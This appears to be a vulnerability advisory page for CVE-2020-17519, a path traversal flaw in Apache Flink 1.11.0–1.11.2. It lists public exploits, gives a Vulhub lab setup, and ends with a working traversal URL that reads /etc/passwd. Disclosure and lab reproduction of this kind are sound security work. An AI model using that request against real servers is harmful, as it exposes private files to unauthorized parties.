HIGH
A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit b561010b0ee741543c3953306037f00d7a9f0801 from apache/flink:master.
Weakness: Files or Directories Accessible to External Parties
The product makes files or directories accessible to unauthorized actors, even though they should not be.
Published: 2021-01-05
Community Advisory
This section is open source, for any additional information that enhances or clarifies the official advisory above.
CVE-2020-17519 Exploits (11)
- B1anda0/CVE-2020-17519 ( 34)
- dolevf/apache-flink-directory-traversal.nse ( 3)
- murataydemir/CVE-2020-17519 ( 2)
- yaunsky/CVE-2020-17519-Apache-Flink ( 1)
- QmF0c3UK/CVE-2020-17519 ( 1)
- hoanx4/CVE-2020-17519
- Osyanina/westone-CVE-2020-17519-scanner
- projectdiscovery/nuclei-templates/cves/CVE-2020-17519.yaml
- radbsie/CVE-2020-17519-Exp
- jaeles-project/jaeles-signatures/cves/apache-flink-lfi-cve-2020-17519.yaml
Show all exploits (+1):
CVE-2020-17519 Vulnerable Docker Environment
Vulhub is an open-source collection of Docker-ized vulnerable environments. No pre-existing knowledge of Docker is required, just execute two simple commands and you have a vulnerable environment.
Apache Flink jobmanager/logs Path Traversal (CVE-2020-17519)
Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities.
A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
References:
- https://github.com/apache/flink/commit/b561010b0ee741543c3953306037f00d7a9f0801
- https://nvd.nist.gov/vuln/detail/CVE-2020-17519
Environment Setup
Execute following commands to start a Apache Flink jobmanager 1.11.2:
docker-compose up -d
After the Apache Flink is started, visit http://your-ip:8081 to view the homepage.
Exploit
Disclose the /etc/passwd:
http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
Official CVE References
View references (16)
- packetstormsecurity.com/files/160849/Apache-Flink-1.11.0-Arbitrary-File-Read-Directory-Traversal.html
- openwall.com/lists/oss-security/2021/01/05/2
- apache.org/thread.html/[email protected]%3Cissues.flink.apache.org%3E
- apache.org/thread.html/[email protected]%3Cannounce.apache.org%3E
- apache.org/thread.html/[email protected]%3Cdev.flink.apache.org%3E
- apache.org/thread.html/[email protected]%3Cissues.flink.apache.org%3E
- apache.org/thread.html/[email protected]%3Cissues.flink.apache.org%3E
- apache.org/thread.html/[email protected]%3Cdev.flink.apache.org%3E
- apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E
- apache.org/thread.html/[email protected]%3Cannounce.apache.org%3E
- apache.org/thread.html/[email protected]%3Cdev.flink.apache.org%3E
- apache.org/thread.html/[email protected]%3Cuser.flink.apache.org%3E
- apache.org/thread.html/[email protected]%3Cissues.flink.apache.org%3E
- apache.org/thread.html/[email protected]%3Cissues.flink.apache.org%3E
- apache.org/thread.html/[email protected]%3Cannounce.apache.org%3E
- apache.org/thread.html/[email protected]%3Cdev.flink.apache.org%3E